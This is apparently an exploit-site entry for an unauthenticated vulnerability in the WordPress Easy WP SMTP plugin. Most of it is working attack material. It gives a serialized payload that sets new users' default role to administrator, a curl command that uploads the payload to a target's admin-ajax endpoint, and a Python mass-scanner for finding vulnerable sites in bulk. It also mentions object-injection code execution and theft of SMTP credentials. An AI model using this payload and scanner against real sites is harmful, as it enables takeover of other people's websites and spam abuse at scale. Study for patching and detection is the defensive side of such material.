WordPress Easy WP SMTP plugin 0-day

2019.03.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

The popular Easy WP SMTP plugin, which as 300,000+ active installations, was prone to a critical zero-day vulnerability that allowed an unauthenticated user to modify WordPress options or to inject and execute code among other malicious actions. Proof of Concept: upload a file that will contain a malicious serialized payload that will enable users registration (users_can_register) and set the user default role (default_role) to “administrator” in the database. ############################################ 1. Create a file name “/tmp/upload.txt” and add this content to it: a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";} ############################################ 2. Upload the file: $ curl https://TARGET/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt' ############################################ Other vulnerabilities could be exploited such as: Remote Code Execution via PHP Object Injection because Easy WP SMTP makes use of unsafe unserialize() calls. Viewing/deleting the log (or any file, since hackers can change the log filename). Exporting the plugin configuration which includes the SMTP host, username and password and using it to send spam emails. ############################################ 3. Simple python script to mass scan the VULN: # -*- coding: utf-8 -* #!/usr/bin/python ##################################### ##KILL THE NET## ##############[LIBS]################### import sys, os ,re ,requests ,urllib2, codecs import subprocess import re import random, string import warnings from multiprocessing.dummy import Pool from time import time as timer from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter('ignore',InsecureRequestWarning) reload(sys) sys.setdefaultencoding('utf8') ##################################### ########################################################################################## try: with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f: ooo = f.read().splitlines() except IOError: pass ooo = list((ooo)) ########################################################################################## def wp_exp(url): try: link = url + '/wp-content/plugins/easy-wp-smtp-master/readme.txt' sss = requests.session() Agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'} ktn1 = sss.get(link, headers=Agent, verify=False, timeout=20, allow_redirects=False) if '= 1.3.9 =' in ktn1.content: print ('SITE VULN : ' + url) open('wpvuln.txt', 'a').write(url+'\n') pass else: print('SITE NOT VULN : ' + url) pass except: pass pass ########################################################################################## def Main(): try: start = timer() ThreadPool = Pool(50) Threads = ThreadPool.map(wp_exp, ooo) print('TIME TAKE: ' + str(timer() - start) + ' S') except: pass if __name__ == '__main__': Main()

References:

https://blog.nintechnet.com/critical-0day-vulnerability-fixed-in-wordpress-easy-wp-smtp-plugin/


Vote for this issue:
75%
25%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top